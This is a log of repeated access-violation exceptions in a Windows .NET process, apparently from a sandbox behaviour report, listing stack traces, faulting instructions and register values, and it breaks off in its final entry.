__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e70fa9 0x8e70f23 0x8e7068f 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 0e exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e71224 registers.esp: 4647728 registers.edi: 42844084 registers.eax: 40650828 registers.ebp: 4647788 registers.edx: 0 registers.ebx: 39489628 registers.esi: 40650828 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e70fa9 0x8e70f40 0x8e7068f 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 0e exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e71224 registers.esp: 4647728 registers.edi: 39488980 registers.eax: 42080844 registers.ebp: 4647788 registers.edx: 0 registers.ebx: 40860804 registers.esi: 42080844 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e70fa9 0x8e70f40 0x8e7068f 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 0e exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e71224 registers.esp: 4647728 registers.edi: 39488980 registers.eax: 43721312 registers.ebp: 4647788 registers.edx: 0 registers.ebx: 42290752 registers.esi: 43721312 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e73729 0x8e70abe 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 bf exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73973 registers.esp: 4647744 registers.edi: 39488980 registers.eax: 45280280 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 44060224 registers.esi: 45280280 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e73729 0x8e70abe 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 bf exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73973 registers.esp: 4647744 registers.edi: 39488980 registers.eax: 40173668 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 39532100 registers.esi: 40173668 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e73729 0x8e70abe 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 bf exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73973 registers.esp: 4647744 registers.edi: 39463404 registers.eax: 41523368 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 40303312 registers.esi: 41523368 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e739f9 0x8e70b84 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 61 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73bd1 registers.esp: 4647744 registers.edi: 39463404 registers.eax: 0 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 41653084 registers.esi: 42873132 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e739f9 0x8e70b84 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 61 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73bd1 registers.esp: 4647744 registers.edi: 39463404 registers.eax: 0 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 39559820 registers.esi: 39772072 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e739f9 0x8e70b84 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 61 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73bd1 registers.esp: 4647744 registers.edi: 39463404 registers.eax: 0 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 40040960 registers.esi: 41261008 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e73d29 0x8e70c26 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 38 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73efa registers.esp: 4647744 registers.edi: 43015292 registers.eax: 0 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 41529976 registers.esi: 42750024 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e73d29 0x8e70c26 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 38 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73efa registers.esp: 4647744 registers.edi: 39764632 registers.eax: 0 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 43021244 registers.esi: 39764968 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e73d29 0x8e70c26 0x7bf25c 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 38 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e73efa registers.esp: 4647744 registers.edi: 39764632 registers.eax: 0 registers.ebp: 4647796 registers.edx: 0 registers.ebx: 39883192 registers.esi: 41103240 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x8e742ac 0x7bf274 0x7b7f10 0x7b36ff 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 e0 0f 8f a1 fe ff ff eb 05 e8 40 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e746f2 registers.esp: 4648204 registers.edi: 41647836 registers.eax: 0 registers.ebp: 4648248 registers.edx: 0 registers.ebx: 41641628 registers.esi: 41648520 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0xb1d1b9 0xb1cfbb 0xb17710 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1d2f0 registers.esp: 1894868 registers.edi: 1894920 registers.eax: 0 registers.ebp: 1894932 registers.edx: 4951976 registers.ebx: 1896372 registers.esi: 36901852 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4852db9 0x4852c1a 0x4852aed 0x4850e13 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 